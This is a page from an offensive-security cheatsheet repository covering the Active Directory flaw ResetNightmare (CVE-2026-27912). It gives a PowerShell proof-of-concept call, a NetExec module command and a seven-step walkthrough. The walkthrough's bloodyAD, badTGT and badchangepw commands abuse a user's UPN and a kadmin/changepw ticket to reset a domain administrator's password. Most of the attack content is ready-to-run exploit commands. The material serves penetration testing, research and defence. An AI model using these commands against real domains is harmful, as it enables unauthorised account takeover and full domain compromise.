daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

resetnightmare.md (3670B)


      1 ---
      2 title: "ResetNightmare"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/ResetNightmare.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/ResetNightmare.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # ResetNightmare
     12 
     13 > CVE-2026-27912
     14 
     15 * [Semperis-Community/ResetNightmare](https://github.com/Semperis-Community/ResetNightmare) - POC tool for ResetNightmare (CVE-2026-27912)
     16 
     17     ```ps1
     18     . .\ResetNightmare.ps1
     19 
     20     Invoke-ResetNightmare `
     21         -TargetAccount "victim" `
     22         -TargetNewPassword "NewP@ssw0rd!" `
     23         -UPNUser "controlledUser" `
     24         -UPNUserPassword "ControlledP@ss!"
     25     ```
     26 
     27 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) - resetnightmare module
     28 
     29     ```ps1
     30     nxc ldap 10.10.10.10 -u user -p password -M resetnightmare -o TARGET='administrator' NEW_PASSWORD='P@ssw0rd' UPN_USER='nxc$' UPN_PASSWORD='Password123!'
     31     ```
     32 
     33 **Exploitation**:
     34 
     35 1. An attacker has obtained a user named **UPNUser**, with no special permissions other than the ability to modify their own UPN value.
     36 2. The attacker sets the user's UPN to the `SamAccountName` of the targeted account; for example, **DemoAdmin1**. This action does not require bypassing UPN uniqueness verification checks. **DemoAdmin1**'s actual UPN should be **<DemoAdmin1@demo.lab>**, so setting **UPNUser**'s UPN to just **DemoAdmin1** is allowed.
     37 
     38     ```ps1
     39     bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' get object 'DemoAdmin1' --attr sAMAccountName
     40     bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' set object UPNUser userPrincipalName -v DemoAdmin1
     41     ```
     42 
     43 3. The attacker requests a TGT for `kadmin/changepw` by specifying **DemoAdmin1** as the user name, `NT-ENTERPRISE` as the name type, and **UPNUser**'s password.
     44 
     45     ```ps1
     46     badTGT 'kerberos+pw://domain.lab\DemoAdmin1:Password123!@10.10.10.10/?ptype=10' --ccache UPNUser.ccache --sname kadmin/changepw
     47     ```
     48 
     49 4. The DC returns a `TGT_REP` with a TGT for **UPNUser** (as indicated by `PAC_REQUESTOR_SID` in the PAC), but with the username **DemoAdmin1**(NT_ENTERPRISE).
     50 
     51 5. Using this ticket to issue a password change request will reset **UPNUser**'s password. To escalate privileges, the attacker changes or clears **UPNUser**'s UPN value, leaving no user with the UPN appearing on the ticket.
     52 
     53     ```ps1
     54     bloodyAD -H 10.10.10.10 -d domain.lab -u Attacker -p 'Password123!' set object UPNUser userPrincipalName -v UPNUser
     55     badchangepw 'kerberos+ccache://domain.lab\DemoAdmin1:UPNUser.ccache@10.10.10.10' 'newAdminPwd1!'
     56     ```
     57 
     58 6. Trying to use this ticket for a `TGS_REQ` after the UPN change will result in a `KDC_ERR_TGT_REVOKED` error, due to the `PAC_REQUESTOR_SID` patch, blocking impersonation. However, by using this ticket to construct the password change request, the password change works.
     59 
     60 7. Now, the attacker can request a new TGT for **DemoAdmin1**, without specifying the `NT-ENTERPRISE` name type. The request now works and the name type of the ticket is `NT-PRINCIPAL`, indicating that the ticket belongs to the real (SamAccountName) **DemoAdmin1** user.
     61 
     62 ## References
     63 
     64 * [Exploiting AD ResetNightmare (CVE-2026-27912) and KerberLoss (CVE-2026-25177) from Linux - Baptiste Crépin - August 10, 2026](https://cravaterouge.com/articles/resetnightmare/)
     65 * [Identity Crisis: Novel Vulnerabilities Leading to Kerberos Downgrade, DoS, and Full Domain Takeover - Shai Laron - August 05, 2026](https://www.semperis.com/blog/identity-crisis-novel-vulnerabilities-leading-to-kerberos-downgrade-dos-and-full-domain-takeover/)